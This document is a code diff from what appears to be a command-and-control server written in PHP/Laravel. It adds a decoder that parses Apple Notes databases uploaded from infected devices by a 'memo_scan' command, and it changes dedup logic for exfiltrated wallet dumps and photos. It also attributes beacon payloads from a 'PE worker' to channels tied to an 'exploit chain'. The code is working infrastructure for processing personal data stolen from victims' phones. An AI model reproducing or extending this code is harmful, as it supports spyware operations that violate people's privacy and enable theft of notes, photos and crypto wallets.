use Illuminate\Support\Facades\Storage;
|
||||
|
||||
/**
|
||||
* Decode an assembled Apple Notes NoteStore.sqlite dump into structured
|
||||
* note items [{title, body, native_id}] for IngestService::ingestNotes().
|
||||
*
|
||||
* memo_scan uploads NoteStore.sqlite + -wal + -shm + memo_scan.json per
|
||||
* command_id. Chunks are reassembled by DsResultStore before decode() runs.
|
||||
* Note bodies live in ZICNOTEDATA.ZDATA as gzip-compressed protobuf; we walk
|
||||
* outer.field2 -> Note.field3 -> Document.field2 for the visible text and
|
||||
* fall back to the ZSNIPPET column. Encrypted notes surface a placeholder.
|
||||
*/
|
||||
class DsMemoDecoder
|
||||
{
|
||||
private const RESULT_BASE = 'c2/ds-results';
|
||||
|
||||
/**
|
||||
* @return array{items: list<array{title:string,body:string,native_id:int|string|null}>, meta: array<string,mixed>}
|
||||
*/
|
||||
public function decode(Device $device, string $commandId): array
|
||||
{
|
||||
$dir = self::RESULT_BASE.'/'.$device->device_id.'/'.$commandId;
|
||||
$disk = Storage::disk('local');
|
||||
$errors = [];
|
||||
$items = [];
|
||||
$notes = 0;
|
||||
$encrypted = 0;
|
||||
$dbPath = null;
|
||||
|
||||
$manifestPath = $dir.'/memo_scan.json';
|
||||
if ($disk->exists($manifestPath)) {
|
||||
$manifest = json_decode((string) $disk->get($manifestPath), true);
|
||||
if (is_array($manifest)) {
|
||||
$dbPath = $manifest['db_path'] ?? null;
|
||||
}
|
||||
}
|
||||
|
||||
$sqliteRel = $dir.'/NoteStore.sqlite';
|
||||
if (! $disk->exists($sqliteRel)) {
|
||||
return ['items' => [], 'meta' => $this->meta($device, $commandId, $dbPath, 0, 0, ['NoteStore.sqlite missing under '.$dir])];
|
||||
}
|
||||
|
||||
$work = storage_path('app/c2/memo-work/'.$device->device_id.'/'.$commandId.'_'.uniqid());
|
||||
@mkdir($work, 0775, true);
|
||||
foreach (['NoteStore.sqlite', 'NoteStore.sqlite-wal', 'NoteStore.sqlite-shm'] as $f) {
|
||||
if ($disk->exists($dir.'/'.$f)) {
|
||||
file_put_contents($work.'/'.$f, (string) $disk->get($dir.'/'.$f));
|
||||
}
|
||||
}
|
||||
|
||||
try {
|
||||
$pdo = new \PDO('sqlite:'.$work.'/NoteStore.sqlite', null, null, [
|
||||
\PDO::ATTR_ERRMODE => \PDO::ERRMODE_EXCEPTION,
|
||||
\PDO::ATTR_DEFAULT_FETCH_MODE => \PDO::FETCH_ASSOC,
|
||||
]);
|
||||
} catch (\Throwable $e) {
|
||||
$this->cleanup($work);
|
||||
return ['items' => [], 'meta' => $this->meta($device, $commandId, $dbPath, 0, 0, ['open sqlite: '.$e->getMessage()])];
|
||||
}
|
||||
|
||||
try {
|
||||
$noteEnt = $this->entityNumber($pdo, 'ICNote');
|
||||
if ($noteEnt === null) {
|
||||
$errors[] = 'ICNote entity not found in Z_PRIMARYKEY';
|
||||
return ['items' => [], 'meta' => $this->meta($device, $commandId, $dbPath, 0, 0, $errors)];
|
||||
}
|
||||
|
||||
$rows = $pdo->prepare(
|
||||
'SELECT n.Z_PK AS pk, n.ZTITLE AS title, n.ZUSERTITLE AS user_title,'
|
||||
.' n.ZSNIPPET AS snippet,'
|
||||
.' nd.ZDATA AS zdata, nd.ZCRYPTOINITIALIZATIONVECTOR AS iv'
|
||||
.' FROM ZICCLOUDSYNCINGOBJECT n'
|
||||
.' LEFT JOIN ZICNOTEDATA nd ON nd.ZNOTE = n.Z_PK'
|
||||
.' WHERE n.Z_ENT = :ent ORDER BY n.Z_PK'
|
||||
);
|
||||
$rows->execute([':ent' => $noteEnt]);
|
||||
|
||||
foreach ($rows as $row) {
|
||||
$notes++;
|
||||
$item = $this->decodeRow($row);
|
||||
if ($item === null) {
|
||||
continue;
|
||||
}
|
||||
if (($item['_encrypted'] ?? false) === true) {
|
||||
$encrypted++;
|
||||
}
|
||||
unset($item['_encrypted']);
|
||||
$items[] = $item;
|
||||
}
|
||||
} catch (\Throwable $e) {
|
||||
$errors[] = 'query: '.$e->getMessage();
|
||||
} finally {
|
||||
$pdo = null;
|
||||
$this->cleanup($work);
|
||||
}
|
||||
|
||||
return ['items' => $items, 'meta' => $this->meta($device, $commandId, $dbPath, $notes, $encrypted, $errors)];
|
||||
}
|
||||
|
||||
/** @param array<string,mixed> $row */
|
||||
private function decodeRow(array $row): ?array
|
||||
{
|
||||
$pk = $row['pk'] ?? null;
|
||||
$title = $this->str($row['title'] ?? null);
|
||||
$userTitle = $this->str($row['user_title'] ?? null);
|
||||
$snippet = $this->str($row['snippet'] ?? null);
|
||||
$iv = $row['iv'] ?? null;
|
||||
$zdata = $row['zdata'] ?? null;
|
||||
$nativeId = is_numeric($pk) ? (int) $pk : null;
|
||||
|
||||
if ($iv !== null && $this->blobLen($iv) > 0) {
|
||||
$body = $snippet !== '' ? $snippet : '[加密备忘录 — 需 keychain 密钥]';
|
||||
$head = $userTitle !== '' ? $userTitle : $title;
|
||||
|
||||
return ['title' => $head !== '' ? $head : $this->titleFromBody($body), 'body' => $body, 'native_id' => $nativeId, '_encrypted' => true];
|
||||
}
|
||||
|
||||
$body = null;
|
||||
if ($zdata !== null && $this->blobLen($zdata) > 0) {
|
||||
$body = $this->extractBody((string) $zdata);
|
||||
}
|
||||
// A body that is only object-replacement chars (U+FFFC = embedded
|
||||
// table/attachment placeholder) carries no readable text. Fall back
|
||||
// to the ZSNIPPET column, which holds Apple's plaintext preview —
|
||||
// for a table-only note that's the cell values (e.g. "1 2 3 5").
|
||||
if ($body === null || ! $this->hasVisibleText($body)) {
|
||||
$body = $snippet;
|
||||
}
|
||||
$body = $body ?? '';
|
||||
$head = $userTitle !== '' ? $userTitle : $title;
|
||||
|
||||
return ['title' => $head !== '' ? $head : $this->titleFromBody($body), 'body' => $body, 'native_id' => $nativeId];
|
||||
}
|
||||
|
||||
private function extractBody(string $zdata): ?string
|
||||
{
|
||||
$decoded = @gzdecode($zdata);
|
||||
if ($decoded === false) {
|
||||
return null;
|
||||
}
|
||||
$note = $this->pbField($decoded, 2);
|
||||
if ($note === null) {
|
||||
return null;
|
||||
}
|
||||
$doc = $this->pbField($note, 3);
|
||||
if ($doc === null) {
|
||||
return null;
|
||||
}
|
||||
$body = $this->pbField($doc, 2);
|
||||
if ($body === null) {
|
||||
return null;
|
||||
}
|
||||
$body = str_replace(["\r\n", "\r"], "\n", $body);
|
||||
$body = preg_replace("/\n{3,}/", "\n\n", $body) ?? $body;
|
||||
|
||||
return trim($body);
|
||||
}
|
||||
|
||||
private function pbField(string $buf, int $field): ?string
|
||||
{
|
||||
$i = 0;
|
||||
$n = strlen($buf);
|
||||
while ($i < $n) {
|
||||
$tag = $this->varint($buf, $i, $i);
|
||||
if ($tag === null) {
|
||||
return null;
|
||||
}
|
||||
$fnum = $tag >> 3;
|
||||
$wtype = $tag & 7;
|
||||
if ($wtype === 0) {
|
||||
$this->varint($buf, $i, $i);
|
||||
} elseif ($wtype === 2) {
|
||||
$len = $this->varint($buf, $i, $i);
|
||||
if ($len === null || $len < 0 || $i + $len > $n) {
|
||||
return null;
|
||||
}
|
||||
$chunk = substr($buf, $i, (int) $len);
|
||||
$i += (int) $len;
|
||||
if ($fnum === $field) {
|
||||
return $chunk;
|
||||
}
|
||||
} elseif ($wtype === 5) {
|
||||
$i += 4;
|
||||
} elseif ($wtype === 1) {
|
||||
$i += 8;
|
||||
} else {
|
||||
return null;
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
private function varint(string $buf, int $pos, int &$next): ?int
|
||||
{
|
||||
$val = 0;
|
||||
$shift = 0;
|
||||
$n = strlen($buf);
|
||||
while ($pos < $n) {
|
||||
$b = ord($buf[$pos++]);
|
||||
$val |= ($b & 0x7f) << $shift;
|
||||
if (($b & 0x80) === 0) {
|
||||
$next = $pos;
|
||||
return $val;
|
||||
}
|
||||
$shift += 7;
|
||||
if ($shift > 63) {
|
||||
return null;
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
private function entityNumber(\PDO $pdo, string $name): ?int
|
||||
{
|
||||
try {
|
||||
$st = $pdo->prepare('SELECT Z_ENT FROM Z_PRIMARYKEY WHERE Z_NAME = :n LIMIT 1');
|
||||
$st->execute([':n' => $name]);
|
||||
$v = $st->fetchColumn();
|
||||
return $v === false || $v === null ? null : (int) $v;
|
||||
} catch (\Throwable $e) {
|
||||
return null;
|
||||
}
|
||||
}
|
||||
|
||||
private function titleFromBody(string $body): string
|
||||
{
|
||||
$body = trim($body);
|
||||
if ($body === '') {
|
||||
return '';
|
||||
}
|
||||
$firstLine = preg_split('/\n+/', $body, 2)[0] ?? $body;
|
||||
return mb_substr(trim($firstLine), 0, 80);
|
||||
}
|
||||
|
||||
/**
|
||||
* True when $s has any visible character besides object-replacement
|
||||
* (U+FFFC), replacement (U+FFFD) and whitespace.
|
||||
*/
|
||||
private function hasVisibleText(string $s): bool
|
||||
{
|
||||
$stripped = preg_replace('/[\x{FFFC}\x{FFFD}\s]/u', '', $s) ?? '';
|
||||
|
||||
return $stripped !== '';
|
||||
}
|
||||
|
||||
private function str(mixed $v): string
|
||||
{
|
||||
return is_string($v) ? trim($v) : '';
|
||||
}
|
||||
|
||||
private function blobLen(mixed $v): int
|
||||
{
|
||||
return is_string($v) ? strlen($v) : 0;
|
||||
}
|
||||
|
||||
/** @param list<string> $errors */
|
||||
private function meta(Device $device, string $commandId, ?string $dbPath, int $notes, int $encrypted, array $errors): array
|
||||
{
|
||||
return [
|
||||
'device_key' => $device->device_id,
|
||||
'command_id' => $commandId,
|
||||
'db_path' => $dbPath,
|
||||
'notes' => $notes,
|
||||
'encrypted' => $encrypted,
|
||||
'errors' => $errors,
|
||||
];
|
||||
}
|
||||
|
||||
private function cleanup(string $work): void
|
||||
{
|
||||
if (! is_dir($work)) {
|
||||
return;
|
||||
}
|
||||
foreach (glob($work.'/*') ?: [] as $f) {
|
||||
@unlink($f);
|
||||
}
|
||||
@rmdir($work);
|
||||
@rmdir(dirname($work));
|
||||
}
|
||||
}
|
||||
@@ -98,17 +98,36 @@ class DsResultStore
|
||||
|
||||
private function alreadyIngested(Device $device, string $filename, string $hash): bool
|
||||
{
|
||||
if (Storage::disk('local')->exists($this->seenPath($device, $hash))) {
|
||||
return true;
|
||||
$isImage = $this->isImage($filename);
|
||||
$seen = Storage::disk('local')->exists($this->seenPath($device, $hash));
|
||||
|
||||
if (! $isImage) {
|
||||
// Non-images (wallet dumps, memo dbs, …): .seen is the only dedup.
|
||||
return $seen;
|
||||
}
|
||||
if ($this->isImage($filename)
|
||||
&& Photo::query()->where('device_id', $device->id)->where('sha256', $hash)->exists()) {
|
||||
$this->markSeen($device, $hash, $filename);
|
||||
|
||||
// For images, the Photo table is the source of truth for album dedup.
|
||||
// markSeen() runs before ingestPhotos(), so a bare .seen marker can
|
||||
// survive a failed/skipped album ingest (album storage was off, the
|
||||
// device record was recreated, an exception was swallowed, …) and
|
||||
// would otherwise block the photo from ever entering the album.
|
||||
$hasPhoto = Photo::query()
|
||||
->where('device_id', $device->id)
|
||||
->where('sha256', $hash)
|
||||
->exists();
|
||||
if ($hasPhoto) {
|
||||
if (! $seen) {
|
||||
$this->markSeen($device, $hash, $filename);
|
||||
}
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
return false;
|
||||
// No Photo row yet. When album storage is enabled, retry the ingest
|
||||
// (return false so store() re-stores + calls ingestPhotos). When
|
||||
// disabled, fall back to .seen for raw-file dedup so we don't keep
|
||||
// re-storing identical bytes under every new command_id.
|
||||
return $seen && ! $device->albumStorageEnabled();
|
||||
}
|
||||
|
||||
private function markSeen(Device $device, string $hash, string $filename): void
|
||||
|
||||
@@ -303,19 +303,58 @@ class IngestService
|
||||
private function resolveChannelAttribution(Request $request, ?array $payload, bool $allowOldC): array
|
||||
{
|
||||
if ($this->isNewBuilderRequest($request)) {
|
||||
if (! $this->isXxbbCoreRequest($request)) {
|
||||
return ['channel_id' => null, 'source_domain' => null];
|
||||
if ($this->isXxbbCoreRequest($request)) {
|
||||
$attr = $this->channelFromVerHeaders($request);
|
||||
if ($attr['channel_id'] !== null) {
|
||||
return $attr;
|
||||
}
|
||||
}
|
||||
} elseif ($allowOldC) {
|
||||
$channelId = $this->extractChannelId($request, $payload);
|
||||
if ($channelId !== null) {
|
||||
return ['channel_id' => $channelId, 'source_domain' => null];
|
||||
}
|
||||
|
||||
return $this->channelFromVerHeaders($request);
|
||||
}
|
||||
if ($allowOldC) {
|
||||
return ['channel_id' => $this->extractChannelId($request, $payload), 'source_domain' => null];
|
||||
|
||||
// Fallback: channel_code from beacon payload (new builder PE worker /beacon path).
|
||||
// PE worker sends device_info.channel_code = the X.Y.ZZ channel id from the exploit chain.
|
||||
$channelCode = $this->extractChannelCodeFromPayload($payload);
|
||||
if ($channelCode !== null) {
|
||||
return ['channel_id' => $channelCode, 'source_domain' => null];
|
||||
}
|
||||
|
||||
return ['channel_id' => null, 'source_domain' => null];
|
||||
}
|
||||
|
||||
/**
|
||||
* Extract new-builder channel_code (X.Y.ZZ) from beacon/payload device_info.
|
||||
* PE worker sends: {"uuid":..., "device_info":{"channel_code":"X.Y.ZZ",...}, ...}
|
||||
*/
|
||||
private function extractChannelCodeFromPayload(?array $payload): ?string
|
||||
{
|
||||
if (! is_array($payload)) {
|
||||
return null;
|
||||
}
|
||||
|
||||
$candidates = [];
|
||||
if (isset($payload['device_info']) && is_array($payload['device_info'])) {
|
||||
$candidates[] = $payload['device_info']['channel_code'] ?? null;
|
||||
}
|
||||
$candidates[] = $payload['channel_code'] ?? null;
|
||||
|
||||
foreach ($candidates as $value) {
|
||||
if (! is_string($value) || $value === '') {
|
||||
continue;
|
||||
}
|
||||
$code = Channel::normalizeNewChannelId($value);
|
||||
if ($code !== null) {
|
||||
return $code;
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
private function isNewBuilderRequest(Request $request): bool
|
||||
{
|
||||
return (bool) $request->attributes->get('coruna_new_builder', false);
|
||||
|
||||
Reference in New Issue
Block a user